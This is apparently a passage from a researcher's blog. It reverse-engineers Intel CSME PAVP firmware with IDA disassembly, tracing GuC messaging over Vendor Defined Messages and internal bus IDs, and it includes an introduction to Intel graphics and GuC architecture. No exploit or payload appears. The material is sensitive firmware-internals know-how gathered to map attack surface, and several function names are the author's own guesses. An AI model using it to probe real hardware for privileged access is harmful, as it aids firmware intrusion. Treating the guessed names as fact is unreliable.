.text:00107815                 ja      short sizes_error
                               ...
.text:00107830
.text:00107830 loc_107830:                             ; CODE XREF: LSPCON_command_handler+C5↑j
.text:00107830                 push    cmd
.text:00107831                 push    ecx
                               ...
.text:00107846                 call    edx             ; Call Command Handler!

Reveresing all the command handlers we find something interesting in the most unexpected one (thus the last I REd): LSPCON_playback_done(). It took me a while to even understand its releated to the GuC, and I’ll explain later how it does so.

What does LSPCON_playback_done do? It checks whether HDCP restrictions should remain in place after a playback is complete.

The function begins by verifying the input parameter (LSPCON_HECICMD_PLAYBACK_DONE_IN) is valid:

.text:00107C6B ; int __cdecl LSPCON_playback_done(PavpCtx *ctx, void *msg)
.text:00107C6B LSPCON_playback_done proc near
.text:00107C6B
.text:00107C6B cur_hdcp_requirements= dword ptr -18h
.text:00107C6B count_active_sessions= dword ptr -14h
.text:00107C6B var_10          = dword ptr -10h
.text:00107C6B ctx             = dword ptr  8
.text:00107C6B msg             = dword ptr  0Ch
.text:00107C6B
.text:00107C6B ctx_ptr = edi
.text:00107C6B                 push    ebp
.text:00107C6C                 mov     ebp, esp
.text:00107C6E                 push    ctx_ptr
.text:00107C6F                 push    esi
.text:00107C70                 push    ebx
.text:00107C71                 sub     esp, 0Ch
.text:00107C74                 mov     [ebp+count_active_sessions], 0
.text:00107C7B                 mov     esi, [ebp+msg]
.text:00107C7E                 mov     eax, ds:stack_cookie_ptr
.text:00107C83                 mov     [ebp+var_10], eax
.text:00107C86                 xor     eax, eax
.text:00107C88                 mov     ctx_ptr, [ebp+ctx]
.text:00107C8B                 test    esi, esi
.text:00107C8D                 jnz     short check_valid_header
                               ...
.text:00107C99 check_valid_header:                     ; CODE XREF: LSPCON_playback_done+22↑j
.text:00107C99                 mov     [esi+LSPCON_HECICMD_PLAYBACK_DONE_IN.header.size], 0
.text:00107CA0                 test    ctx_ptr, ctx_ptr
.text:00107CA2                 jz      short invalid_parameter
.text:00107CA4                 cmp     [ctx_ptr+PavpCtx.Lspcon], 0
.text:00107CA8                 jz      short invalid_parameter

And now comes the interesting part:

.text:00107CAA                 lea     eax, [ebp+count_active_sessions]
.text:00107CAD                 push    eax             ; num_active_sessions
.text:00107CAE                 push    0               ; type
.text:00107CB0                 push    ctx_ptr         ; ctx
.text:00107CB1                 call    GUC_get_active_sessions ; 
.text:00107CB6                 add     esp, 0Ch
.text:00107CB9                 mov     ebx, eax
.text:00107CBB                 test    eax, eax
.text:00107CBD                 jz      short got_active_sessions

If there are any remaining active sessions the code continues to check what level of HDCP protection they require and set protection to that level if it is lower then the current level, I won’t go into that disassembly as its not really interesting.

Why do I think GUC_get_active_sessions is actually related to GuC and why did I name it that? Lets continue by examining this function. Its just a wrapper around a function I called GUC_send_message that sends message no. 6,

.text:0010452C ; int __cdecl GUC_get_active_sessions(PavpCtx *ctx, int type, unsigned int *num_active_sessions)
.text:0010452C GUC_get_active_sessions proc near       ; CODE XREF: LSPCON_playback_done+46↓p
.text:0010452C
.text:0010452C guc2csme        = GUC2CSME_MSG ptr -18h
.text:0010452C csme2guc        = CSME2GUC_MSG ptr -10h
.text:0010452C ctx             = dword ptr  8
.text:0010452C type            = dword ptr  0Ch
.text:0010452C num_active_sessions= dword ptr  10h
.text:0010452C
.text:0010452C ctx_ptr = esi
                               ...
.text:0010455B type_ok:
.text:0010455B                 mov     dword ptr [ebp+csme2guc.command], GUC_MSG_GET_ACTIVE_SESSIONS ; =6
.text:00104562                 mov     [ebp+csme2guc.data1], al
.text:00104565                 lea     eax, [ebp+guc2csme.value]
.text:00104568                 mov     [ebp+guc2csme.value], 0
.text:0010456F                 push    eax             ; guc2csme
.text:00104570                 lea     eax, [ebp+csme2guc]
.text:00104573                 push    eax             ; csme2guc
.text:00104574                 push    ctx_ptr         ; ctx
.text:00104575                 call    GUC_send_message

GUC_send_message() gets two parameters in addition to the PAVP context: a CSME2GUC structure and a GUC2CSME structure. How does it work? It tries to send the message several times in a loop, each time waiting for a short timeout. The first iteration of the loop also wakes the GuC by enabling it through managment functions (if it isn’t already enabled), and sending a special wake message using a function I named GUC_send_VDM().

.text:001041FF ; int __cdecl GUC_send_message(PavpCtx *ctx, CSME2GUC_MSG *csme2guc, GUC2CSME_MSG *guc2csme)
.text:001041FF GUC_send_message proc near              ; CODE XREF: GUC_get_active_sessions+49↓p
.text:001041FF                                         ; sub_1045C5+3F↓p
.text:001041FF
.text:001041FF ctx             = dword ptr  8
.text:001041FF csme2guc        = dword ptr  0Ch
.text:001041FF guc2csme        = dword ptr  10h
.text:001041FF
.text:001041FF attempt = esi
.text:001041FF ctx_ptr = ebx
.text:001041FF                 push    ebp
.text:00104200                 mov     ebp, esp
.text:00104202                 push    edi
.text:00104203                 push    attempt
.text:00104204                 xor     attempt, attempt
.text:00104206                 push    ctx_ptr
.text:00104207                 mov     ctx_ptr, [ebp+ctx]
.text:0010420A
.text:0010420A send_loop:                              ; CODE XREF: GUC_send_message+A3↓j
.text:0010420A                 inc     attempt
.text:0010420B                 cmp     attempt, 1
.text:0010420E                 jnz     short send_wake_msg_loop
.text:00104210
.text:00104210 first_attempt:
.text:00104210                 push    ctx_ptr
.text:00104211                 call    GUC_disable_power_gate?
.text:00104216                 mov     edi, eax
.text:00104218                 pop     eax
.text:00104219                 test    edi, edi
.text:0010421B                 jnz     loc_1042A8
.text:00104221
.text:00104221 send_wake_msg_loop:                     ; CODE XREF: GUC_send_message+F↑j
.text:00104221                                         ; GUC_send_message+4E↓j
.text:00104221                 push    VDM_CSME_TO_GUC_WAKE_REQ
.text:00104223                 push    0               ; msg
.text:00104225                 push    ctx_ptr
.text:00104226                 call    GUC_send_VDM    ; VDM == Vendor Defined Message?
.text:0010422B                 add     esp, 0Ch
.text:0010422E                 mov     edi, eax
.text:00104230                 test    eax, eax
.text:00104232                 jnz     msg_error
.text:00104238                 push    [ebp+guc2csme]
.text:0010423B                 push    GUC_IS_AWAKE
.text:0010423D                 push    ctx_ptr
.text:0010423E                 call    GUC_wait_for_message ; wait for GUC is awake message
.text:00104243                 add     esp, 0Ch
.text:00104246                 mov     edi, eax
.text:00104248                 cmp     eax, PAVP_STATUS_TRY_AGAIN
.text:0010424D                 jz      short send_wake_msg_loop
.text:0010424F                 cmp     eax, PAVP_STATUS_TIMEOUT
.text:00104254                 jnz     short got_awake_msg
.text:00104256
.text:00104256 timeout:                                ; CODE XREF: GUC_send_message+92↓j
.text:00104256                                         ; GUC_send_message+C9↓j
.text:00104256                 mov     edi, PAVP_STATUS_TIMEOUT
.text:0010425B                 jmp     short loc_104297
.text:0010425D ; ---------------------------------------------------------------------------
.text:0010425D

Once the GuC awake message was received the actually GuC message is send, again with GUC_send_VDM().

.text:0010425D got_awake_msg:                          ; CODE XREF: GUC_send_message+55↑j
.text:0010425D                 test    eax, eax
.text:0010425F                 jnz     short loc_1042A8
.text:00104261                 mov     eax, [ebp+csme2guc]
.text:00104264                 push    VDM_FROM_CSME
.text:00104266                 push    dword ptr [eax+CSME2GUC_MSG.command]
.text:00104268                 push    ctx_ptr
.text:00104269                 call    GUC_send_VDM
.text:0010426E                 add     esp, 0Ch
.text:00104271                 mov     edi, eax
.text:00104273                 test    eax, eax
.text:00104275                 jnz     short loc_1042A8
.text:00104277                 push    [ebp+guc2csme]
.text:0010427A                 mov     eax, [ebp+csme2guc]
.text:0010427D                 movzx   eax, [eax+CSME2GUC_MSG.command]
.text:00104280                 push    eax
.text:00104281                 push    ctx_ptr
.text:00104282                 call    GUC_wait_for_message

Its then waits for the return message GUC_wait_for_message(). Now you have to say - Wise guy, how do you know this is actually releated to GuC? What is this VDM stuff? Did Ded Moroz drop them in your cabin?

VDMs are Vendor Defined Messages, a way to send custom messages to devices over a PCI bus. They are sent through IOCTLs to the VDM driver in CSME. The IOCTL gets data through a message:

00000000 IOCTL_VDM_WRITE struc ; (sizeof=0x12, mappedto_145)
00000000 addr_offset     dd ?
00000004 data            dd ?          ; This is a bitfield per the spec
00000008 info            VDM_TX ?
00000012 IOCTL_VDM_WRITE ends
00000000 VDM_TX          struc ; (sizeof=0xA, mappedto_142)
00000000                                         ; XREF: GucCtx/r
00000000                                         ; IOCTL_VDM_WRITE/r
00000000 msg             dd ?                    ; XREF: setup_guc_vdm+F/r
00000004 pci_req_id      dw ?                    ; XREF: setup_guc_vdm+12/w
00000006 tag             dw ?
00000008 pci_tgt_id      dw ?                    ; XREF: setup_guc_vdm+1C/w
0000000A VDM_TX          ends

Here you have the first hint of how I connected all this to the GuC. Lets just get the VDM function out of the way:

.text:0014889D VDM_write       proc near               ; CODE XREF: sub_1028DB+CE↑p
.text:0014889D                                         ; GUC_send_VDM+4F↑p ...
.text:0014889D
.text:0014889D var_40          = byte ptr -40h
.text:0014889D vdm_ioctl       = IOCTL_VDM_WRITE ptr -3Ch
.text:0014889D var_10          = dword ptr -10h
.text:0014889D fd              = dword ptr  8
.text:0014889D addr_info       = dword ptr  0Ch
.text:0014889D addr_offset     = dword ptr  10h
.text:0014889D data            = dword ptr  14h
.text:0014889D
.text:0014889D                 push    ebp
.text:0014889E                 mov     ebp, esp
.text:001488A0                 push    edi
.text:001488A1                 push    esi
.text:001488A2                 push    ebx
.text:001488A3                 sub     esp, 34h
.text:001488A6                 mov     ebx, [ebp+fd]
.text:001488A9                 mov     eax, ds:stack_cookie_ptr
.text:001488AE                 mov     [ebp+var_10], eax
.text:001488B1                 xor     eax, eax
.text:001488B3                 mov     edi, [ebp+addr_info]
.text:001488B6                 test    ebx, ebx
.text:001488B8                 js      short invalid_parameter
.text:001488BA                 test    edi, edi
.text:001488BC                 jz      short invalid_parameter
.text:001488BE                 lea     esi, [ebp+vdm_ioctl]
.text:001488C1
.text:001488C1 build_ioctl_data:
.text:001488C1                 push    44 ; sizeof(vdm_ioctl)
.text:001488C3                 push    0
.text:001488C5                 push    esi
.text:001488C6                 call    near ptr memset
.text:001488CB                 mov     eax, [ebp+addr_offset]
.text:001488CE                 mov     [ebp+vdm_ioctl.addr_offset], eax
.text:001488D1                 mov     eax, [ebp+data]
.text:001488D4                 mov     [ebp+vdm_ioctl.data], eax
.text:001488D7                 lea     eax, [ebp+vdm_ioctl.info]
.text:001488DA                 push    0Ah             ; sizeof(TX info)
.text:001488DC                 push    edi
.text:001488DD                 push    0Ah
.text:001488DF                 push    eax
.text:001488E0                 call    near ptr memcpy_s
.text:001488E5                 lea     eax, [ebp+var_40]
.text:001488E8                 push    eax
.text:001488E9                 push    44
.text:001488EB                 push    esi
.text:001488EC                 push    44
.text:001488EE                 push    esi
.text:001488EF                 push    2        ; IOCTL write
.text:001488F1                 push    ebx
.text:001488F2                 call    near ptr ioctl_s

The IOCTL is sent to a file handle. Where is it set? We now go back to the PAVP init code and look for all places where file handles are init. There we find to functions I am pretty sure initialize the GuC and the Graphics Key Manager (GKM), thus I appropriatly named them GUC_init() and GKM_init() (I keep reminding you I named these functions as I have no clue what is their realy name, these are my guesses).

As usual, the function begins by checking it's input argument:

.text:001043C3 GUC_init        proc near               ; CODE XREF: pavp_init+259↑p
.text:001043C3
.text:001043C3 ctx             = dword ptr  8
.text:001043C3
.text:001043C3 ctx_ptr = ebx
.text:001043C3                 push    ebp
.text:001043C4                 mov     ebp, esp
.text:001043C6                 push    esi
.text:001043C7                 push    ctx_ptr
.text:001043C8                 mov     esi, 1005h
.text:001043CD                 mov     ctx_ptr, [ebp+ctx]
.text:001043D0                 test    ctx_ptr, ctx_ptr
.text:001043D2                 jz      invalid_paramter
.text:001043D8                 cmp     [ctx_ptr+PavpCtx.guc_ctx], 0
.text:001043DC                 jnz     invalid_paramter

Next it allocates a context for GuC operations:

.text:001043E2                 push    90 ; sizeof(GucContext
.text:001043E4                 push    1
.text:001043E6                 call    near ptr calloc ; allocate GucContext (0x5A bytes)
.text:001043EB                 mov     [ctx_ptr+PavpCtx.guc_ctx], eax
.text:001043EE                 test    eax, eax
.text:001043F0                 pop     esi
.text:001043F1                 pop     edx
.text:001043F2                 jnz     short alloc_ok  ; start with no FD

The struct itself:

00000000 GucCtx          struc ; (sizeof=0x5A, mappedto_140)
00000000 vdm_file_descriptor dd ?                ; XREF: GUC_init:alloc_ok/w
00000000                                         ; GUC_init+5C/w ...
00000004 pg_timer        Timer ?
00000028 watchdog        Timer ?                 ; XREF: GUC_command_handler+8C/o
0000004C vdm             VDM_TX ?                ; XREF: GUC_init:loc_104441/o
00000056 state           dd ?                    ; XREF: GUC_pg_timer_routine+39/w
00000056                                         ; GUC_init+127/w
0000005A GucCtx          ends

It first checks if a file descriptor has already been setup by the Graphics Key Manager, and if so uses the same file descriptor - apparently they share the same VDM channel. Otherwise a new FD is setup in setup_guc_vdm(). The rest of the code initializes two timers - one related to some kind of watchdog and the other to power managment.

.text:0010440C
.text:0010440C alloc_ok:                               ; CODE XREF: GUC_init+2F↑j
.text:0010440C                 mov     [eax+GucCtx.vdm_file_descriptor], 0FFFFFFFFh ; start with no FD
.text:00104412                 mov     eax, [ctx_ptr+PavpCtx.graphic_key_mgr]
.text:00104415                 test    eax, eax
.text:00104417                 jz      short no_gkm
.text:00104419                 mov     edx, [ctx_ptr+PavpCtx.guc_ctx]
.text:0010441C                 mov     eax, [eax+GkmCtx.vdm_file_descriptor]
.text:0010441F                 mov     [edx+GucCtx.vdm_file_descriptor], eax
.text:00104421
.text:00104421 no_gkm:                                 ; CODE XREF: GUC_init+54↑j
.text:00104421                 mov     eax, [ctx_ptr+PavpCtx.guc_ctx]
.text:00104424                 cmp     [eax+GucCtx.vdm_file_descriptor], 0
.text:00104427                 jns     short loc_104441
.text:00104429                 push    4B00FDh
.text:0010442E                 mov     esi, 100Eh
.text:00104433                 push    2
.text:00104435                 call    near ptr log_printf_0
.text:0010443A                 pop     eax
.text:0010443B                 pop     edx
.text:0010443C                 jmp     invalid_paramter
.text:00104441 ; ---------------------------------------------------------------------------
.text:00104441
.text:00104441 loc_104441:                             ; CODE XREF: GUC_init+64↑j
.text:00104441                 add     eax, GucCtx.vdm
.text:00104444                 push    eax
.text:00104445                 call    setup_guc_vdm
.text:0010444A                 mov     esi, eax

And this is the part we have been waiting for:

.text:00102810 setup_guc_vdm   proc near               ; CODE XREF: GKM_init+2D↓p
.text:00102810                                         ; GUC_init+82↓p
.text:00102810
.text:00102810 vdm             = dword ptr  8
.text:00102810
.text:00102810 vdm_ptr = edx
.text:00102810                 push    ebp
.text:00102811                 mov     eax, 1005h
.text:00102816                 mov     ebp, esp
.text:00102818                 mov     vdm_ptr, [ebp+vdm]
.text:0010281B                 test    vdm_ptr, vdm_ptr
.text:0010281D                 jz      short loc_10284A
.text:0010281F                 mov     al, byte ptr [vdm_ptr+(VDM_TX.msg+3)]
.text:00102822                 mov     dword ptr [vdm_ptr+VDM_TX.pci_req_id], 0B0h ; CSME: bus: 0, device: 22, function 0
.text:00102829                 or      eax, 7
.text:0010282C                 mov     [vdm_ptr+VDM_TX.pci_tgt_id], 10h ; GUC: buf: 0, device: 2, function 0
.text:00102832                 and     eax, 0FFFFFF8Fh
.text:00102835                 mov     byte ptr [vdm_ptr], 0D3h
.text:00102838                 mov     [vdm_ptr+3], al
.text:0010283B                 mov     al, [vdm_ptr+2]
.text:0010283E                 or      byte ptr [vdm_ptr+1], 0Fh
.text:00102842                 and     eax, 0FFFFFF80h
.text:00102845                 mov     [vdm_ptr+2], al
.text:00102848                 xor     eax, eax
.text:0010284A
.text:0010284A loc_10284A:                             ; CODE XREF: setup_guc_vdm+D↑j
.text:0010284A                 pop     ebp
.text:0010284B                 retn
.text:0010284B setup_guc_vdm   endp

Here we have the internal bus IDs for the GuC and CSME.

Results are retrieved using GUC_wait_for_message() - it uses select() to wait on the VDM file handle and parses the message. Something interesting I found out it that messages are not initiated only by the CSME - the GuC can initiate messages to the CSME and the CSME responds. GUC_wait_for_message() uses a handler table with 11 entries, but 4 are NULL.

For example, one message I decoded gets some production information for the chip:

.text:00103EDA GUC_api_get_production_info proc near
.text:00103EDA
.text:00103EDA var_14          = byte ptr -14h
.text:00103EDA var_13          = byte ptr -13h
.text:00103EDA var_E           = byte ptr -0Eh
.text:00103EDA var_D           = byte ptr -0Dh
.text:00103EDA var_C           = dword ptr -0Ch
.text:00103EDA ctx             = dword ptr  8
.text:00103EDA
.text:00103EDA ctx_ptr = esi
.text:00103EDA                 push    ebp
.text:00103EDB                 mov     ebp, esp
.text:00103EDD                 push    ctx_ptr
.text:00103EDE                 push    ebx
.text:00103EDF                 sub     esp, 0Ch
.text:00103EE2                 mov     [ebp+var_14], 0
.text:00103EE6                 mov     ctx_ptr, [ebp+ctx]
.text:00103EE9                 mov     eax, ds:stack_cookie_ptr
.text:00103EEE                 mov     [ebp+var_C], eax
.text:00103EF1                 xor     eax, eax
.text:00103EF3                 push    ctx_ptr
.text:00103EF4                 call    GUC_enable_power_gate
.text:00103EF9                 lea     eax, [ebp+var_14]
.text:00103EFC                 push    eax
.text:00103EFD                 call    test_byte_12h_from_snowball_rbe_sku
.text:00103F02                 pop     ecx
.text:00103F03                 test    eax, eax
.text:00103F05                 pop     ebx
.text:00103F06                 mov     ebx, 109h
.text:00103F0B                 jnz     short loc_103F48
.text:00103F0D                 mov     ebx, 9
.text:00103F12                 cmp     [ebp+var_14], 0
.text:00103F16                 jnz     short loc_103F48
.text:00103F18                 lea     eax, [ebp+var_13]
.text:00103F1B                 mov     ebx, 109h
.text:00103F20                 push    eax
.text:00103F21                 call    get_7_bytes_from_snowball_rbe_sku
.text:00103F26                 pop     edx
.text:00103F27                 test    eax, eax
.text:00103F29                 jnz     short loc_103F48
.text:00103F2B                 mov     bl, [ebp+var_E]
.text:00103F2E                 mov     al, [ebp+var_D]
.text:00103F31                 shr     bl, 2           ; actuall data from CPUs looks like production year & week
.text:00103F34                 and     eax, 0Fh
.text:00103F37                 shl     eax, 9
.text:00103F3A                 and     ebx, 3Fh
.text:00103F3D                 shl     ebx, 0Dh
.text:00103F40                 or      ebx, 109h
.text:00103F46                 or      ebx, eax
.text:00103F48
.text:00103F48 loc_103F48:                             ; CODE XREF: GUC_api_get_production_info+31↑j
.text:00103F48                                         ; GUC_api_get_production_info+3C↑j ...
.text:00103F48                 push    ctx_ptr
.text:00103F49                 call    GUC_enable_power_gate
.text:00103F4E                 push    2
.text:00103F50                 push    ebx
.text:00103F51                 push    ctx_ptr
.text:00103F52                 call    GUC_send_VDM
.text:00103F57                 mov     edx, [ebp+var_C]
.text:00103F5A                 xor     edx, ds:stack_cookie_ptr
.text:00103F60                 jz      short loc_103F67
.text:00103F62                 call    near ptr __stkchk
.text:00103F67
.text:00103F67 loc_103F67:                             ; CODE XREF: GUC_api_get_production_info+86↑j
.text:00103F67                 lea     esp, [ebp-8]
.text:00103F6A                 pop     ebx
.text:00103F6B                 pop     ctx_ptr
.text:00103F6C                 pop     ebp
.text:00103F6D                 retn
.text:00103F6D GUC_api_get_production_info endp

Why do I think this is related to production information? Because it reads data from a file called "/snowball/rbe_sku" (Intel’s name!). I don’t have any idea what Snowball means, RBE usualy means ROM Boot Extenion, so it reads data from the ROM? The actuall data from a few processors appears to be correlated to production year and work week for the CPU.

.text:00148AF7 test_byte_12h_from_snowball_rbe_sku proc near
.text:00148AF7                                         ; CODE XREF: pavp_init+10A↑p
.text:00148AF7                                         ; GUC_api_get_production_info+23↑p ...
.text:00148AF7
.text:00148AF7 buffer          = byte ptr -24h
.text:00148AF7 stack_cookie    = dword ptr -8
.text:00148AF7 var_4           = dword ptr -4
.text:00148AF7 out_byte_12h    = dword ptr  8
.text:00148AF7
.text:00148AF7                 push    ebp
.text:00148AF8                 mov     ebp, esp
.text:00148AFA                 push    ebx
.text:00148AFB                 sub     esp, 20h
.text:00148AFE                 mov     eax, ds:stack_cookie_ptr
.text:00148B03                 mov     [ebp+stack_cookie], eax
.text:00148B06                 xor     eax, eax
.text:00148B08                 lea     eax, [ebp+buffer]
.text:00148B0B                 push    1Ch
.text:00148B0D                 mov     ebx, [ebp+out_byte_12h]
.text:00148B10                 push    eax
.text:00148B11                 push    offset aSnowballRbeSku_0 ; "/snowball/rbe_sku"
.text:00148B16                 call    read_file_completely
.text:00148B1B                 add     esp, 0Ch
.text:00148B1E                 test    eax, eax
.text:00148B20                 jnz     short loc_148B2A
.text:00148B22                 mov     dl, [ebp+buffer+12h]
.text:00148B25                 and     edx, 1
.text:00148B28                 mov     [ebx], dl
.text:00148B2A
.text:00148B2A loc_148B2A:                             ; CODE XREF: test_byte_12h_from_snowball_rbe_sku+29↑j
.text:00148B2A                 mov     ecx, [ebp+stack_cookie]
.text:00148B2D                 xor     ecx, ds:stack_cookie_ptr
.text:00148B33                 jz      short loc_148B3A
.text:00148B35                 call    near ptr __stkchk
.text:00148B3A
.text:00148B3A loc_148B3A:                             ; CODE XREF: test_byte_12h_from_snowball_rbe_sku+3C↑j
.text:00148B3A                 mov     ebx, [ebp+var_4]
.text:00148B3D                 leave
.text:00148B3E                 retn
.text:00148B3E test_byte_12h_from_snowball_rbe_sku endp

.text:00148A54 read_file_completely proc near          ; CODE XREF: get_7_bytes_from_snowball_rbe_sku+21↓p
.text:00148A54                                         ; test_byte_12h_from_snowball_rbe_sku+1F↓p ...
.text:00148A54
.text:00148A54 filename        = dword ptr  8
.text:00148A54 buffer          = dword ptr  0Ch
.text:00148A54 byte_count      = dword ptr  10h
.text:00148A54
.text:00148A54                 push    ebp
.text:00148A55                 mov     ebp, esp
.text:00148A57                 push    edi
.text:00148A58                 push    esi
.text:00148A59                 push    ebx
.text:00148A5A                 push    0
.text:00148A5C count = esi
.text:00148A5C                 mov     count, [ebp+byte_count]
.text:00148A5F
.text:00148A5F open_file:
.text:00148A5F                 push    [ebp+filename]
.text:00148A62                 call    near ptr open
.text:00148A67 file_handle = ebx
.text:00148A67                 mov     file_handle, eax
.text:00148A69                 pop     eax
.text:00148A6A                 test    file_handle, file_handle
.text:00148A6C                 pop     edx
.text:00148A6D                 mov     eax, 222
.text:00148A72                 js      short loc_148A98
.text:00148A74
.text:00148A74 read_file:
.text:00148A74                 push    count
.text:00148A75                 push    [ebp+buffer]
.text:00148A78                 push    file_handle
.text:00148A79                 call    near ptr read
.text:00148A7E
.text:00148A7E close_file:
.text:00148A7E                 push    file_handle
.text:00148A7F                 mov     edi, eax
.text:00148A81                 call    near ptr close
.text:00148A86                 add     esp, 10h
.text:00148A89                 test    edi, edi
.text:00148A8B                 js      short loc_148A93
.text:00148A8D                 xor     eax, eax
.text:00148A8F                 cmp     edi, count
.text:00148A91                 jz      short loc_148A98
.text:00148A93
.text:00148A93 loc_148A93:                             ; CODE XREF: read_file_completely+37↑j
.text:00148A93                 mov     eax, 99
.text:00148A98
.text:00148A98 loc_148A98:                             ; CODE XREF: read_file_completely+1E↑j
.text:00148A98                                         ; read_file_completely+3D↑j
.text:00148A98                 lea     esp, [ebp-0Ch]
.text:00148A9B                 pop     ebx
.text:00148A9C                 pop     esi
.text:00148A9D                 pop     edi
.text:00148A9E                 pop     ebp
.text:00148A9F                 retn
.text:00148A9F read_file_completely endp

Conclusion

I am still actively working on this to see what attack surfaces there are from GuC->CSME and CSME->GuC, but it looks like Intel did a really good job checking bounds and arguments. The Graphics Key Manager is next in the queue, it look like the surface there is more promising.

There is also a lot more to decode in PAVP, I only decoded a small part of the context structure:

PavpCtx         struc ; (sizeof=0x80, mappedto_123)
00000000 field_0         dd ?
00000004 field_4         dd ?
00000008 heci_client     dd ?
0000000C server_ctx      dd ?
00000010 graphic_key_mgr dd ?                    ; XREF: GUC_init+4F/r
00000014 vkm             dd ?
00000018 guc_ctx         dd ?                    ; XREF: GUC_pg_timer_routine+32/r
00000018                                         ; GUC_disable_power_gate?+1E/r ...
0000001C Lspcon          dd ?                    ; XREF: LSPCON_command_handler+22/r
0000001C                                         ; LSPCON_playback_done+39/r ...
00000020 field_20        dd ?
00000024 timer_ctx       dd ?                    ; XREF: GUC_disable_power_gate?+56/r
00000024                                         ; GUC_command_handler+90/r ... ; struct offset (PavpPortConfig)
00000028 field_28        dd ?
0000002C port_cfg        PavpPortConfig ?
00000044 field_44        dd ?
00000048 field_48        dd ?
0000004C field_4C        dd ?
00000050 field_50        dd ?
00000054 handlers        dd ?                    ; XREF: GUC_command_handler+29/r
00000058 field_58        dd ?
0000005C field_5C        dd ?
00000060 field_60        dd ?
00000064 field_64        dd ?
00000068 field_68        dd ?
0000006C field_6C        dd ?
00000070 field_70        dd ?
00000074 field_74        dd ?
00000078 field_78        dd ?
0000007C field_7C        dd ?
00000080 PavpCtx         ends

Enough for today, especially as my day job has warmed up a bit in the last three weeks - more on that later! I promise it will be very interesting (but not hardware related).

Security of the Intel Graphics Stack - Part 1 - Introduction

10 February 2021 at 05:00

I promised I’ll post stuff about low level hardware issues, and here is my second post on the subject, the first part in a series about the Intel graphics stack.

This post series will be a summary of about a decade of unpublished research I am trying to organize and share. Not all of it is current, as newer hardware is harder to inspect and reverse, but I think much of the research is relevant.

The first post below is a quick introduction to the different components on the hardware and software side we’ll need to dive into security issues in the next post.

General Architecture

  • Processor graphics - The graphics unit that is part of the processor itself. Has had many codenames over the years, HD Graphics, UHD Graphics, Iris, Gen9, Gen11, Intel Xe and so on. Even the β€˜Gen’ name has double meaning - both generation and β€˜Graphics ENgine’. In UEFI code it is sometimes refered to at the IGD - Integrated Graphics Device.
  • The GuC - an embedded i486 core that supports graphics scheduling, power management and firmware attestation.

  • UEFI and OS Drivers

Core Graphics

As discussed in the introduction to the SecureBoot post, the Intel CPU has four major component groups - the CPU cores, the L3 (or LLC) cache slices, the β€˜Uncore’ or β€˜System Agent’ parts, all connected through a ring bus inside the die.

Gen9 Architecture

The graphics process is made up from several slices and an unslice (like uncore) area that includes common components. Each slice is divided into subslices and a slice common area. The subslices are made up of several Execution Units (EUs), and Texture unit and a L1 Cache/Memory. The common area includes the L3 cache and the dataport. The limit to the number of slices is the interconnect between them and the unslice. There is always only a single unslice. In the unslice we can find the connection to the ring bus, aptly named the GT interface (GTI), the Command Streamer is reads commands from the system memory and into the graphics processor, the fixed function pipline (FF pipeline), and the thread dispatcher \& spawner that lunch shader programs and GPGPU (General Purpose Computing) programs onto the EUs. The FF pipeline deals with fixed functions such as vertice operations (called the Geometry Pipe), and other dedicated hardware such as video transcoding.

Different SKUs have different combinations of these. For example:

  • Skylake GT2: 1 slice of 3 subslices of 8 EUs (1x3x8)
  • Skylake GT3: 2x3x8
  • Skylake GT4: 3x3x8

Gen9 Architecture

The graphics engine is also connect straight to the IOSF (Intel On Chip Fabric internal bus, see the secureboot post bus, through a controller called Gunit. Gunit is connect to both the primary and secondary IOSF and exports functions for communicating with the graphics engine and implementing IOMMU support for graphics memory and unified memory.

All of this is connected to the display IO interconnect and output to DisplayPort and HDMI outputs.

Gen9 Architecture

2D Graphics Pipeline

The 2D graphics engine is a standalone IP block in the unslice area, and has its own command streamer, registers and cache. It has 256 different operation codes, for example:

2D BitBlt Operations

3D Graphics Pipeline

The fixed function pipeline in the unslice implements the DirectX 11 redndering pipeline stages: Vertex Fetch -> Vertex Shader -> Hull Shader -> Tessellator -> Domain Shader -> Geometry Shader -> Clipper -> Windower -> Z Ordering, -> Pixel Shader - >Pixel Output. Some of these functions are self contained, but many are implemented using by running shader programs on the EUs in the slices. EUs can send certain operations back into dedicated hardware units.

The Execution Units (EUs)

The EUs are in-order mulithreaded SIMD processing cores. Each execution thread is dispatched has its own 128 register space and executed programs called β€œkernels”. All instructions are 8 channels wide, e.g. operate on 8 registers at a time (or 16 half registers). Its supports arithmetic, logical and control flow instructions on floats and ints. Registers are addressed by address. The EU thread dispatcher implements priorities based on age, i.e. oldest is highest priority, and whether the trhead is blocked waiting on instruction fetches, register dependencies etc’. C

The GuC

The GuC is a small embedded core that supports graphics scheduling, power management and firmware attestation. It is implemented in an i486DX4 CPU (also called P24C and Minute IA), although it seems that since broadwell it has been extended to the Pentium (i586) ISA. It runs a small microkernel call ΞΌOS. The GuC ΞΌOS runs only kernel level tasks (even though ΞΌOS supports ΞΌApps). The firmware is written in C with not stdlib. In the GuC we can find supporting blocks: ROM memory, 8KB L1 on core cache, 64KB/128KB/256KB (Broadwell/Skylake/CannonLake) of SRAM memory which is used for code+data+cache and a 8KB stack. It also has power management, DMA engine, etc’. Communication to the GuC is done through memory-mapped IO and bidirectional interrupts.

GuC architecture

The GuC offers a light-weight mechanism for dispatch work the host submits to the GPU. This means the GPU driver does not need to handle dispatch and job queuing, making it much faster. The user mode driver (UMD) can communicate with the GuC directly when required and bypass the need to context switch the main CPU into kernel mode. The kernel mode driver (KMD) uses the GuC as a gateway for job submission as well. This simplifies the Kernel and provides a single point where all jobs are submitted. Communication between the UMD and the GuC is done through shared memory queues.

Why is the GuC interesting? Because I think it can communicate with the CSME, CPU and GPU and everything over the IOSF, and if it has bugs it can be used to gain very privileged access to the system and memory.

Boot ROM and GuC firmware

At system startup GuC is held at reset state until the UEFI firmware initializes the shared memory region for the GPU. Inside the shared region a special subregion call WOPCM is set aside fur GuC (and HuC) firmware. It then releases the GuC from reset and it in turn starts executing a small non-modifiable Boot ROM (16/32KB in size) that initializes the basic GuC hardware, and waits for an interrupt signalling the firmware has been copied to the WOPCM region. The GuC firmware is an opaque blob supplied by Intel as part of the GPU KMD, which copies it to the shared memory region (GGTT) and signals the Boot ROM with an interrupt. The bootrom verifies the firmware with a digital signature using a SHA256 hash + PKCSv2.1 RSA signature, and if the test passes copies it to SRAM and starts executing.

The GUC firmware can be extracted from the graphics driver and reversed. Screenshot of IDA open on the kabylake GuC: GUC firmware

The GuC also attest the firmware for the video decoder unit, called HuC. The HuC is an HEVC/H.265 decoded implement in hardware.

The ΞΌOS kernel

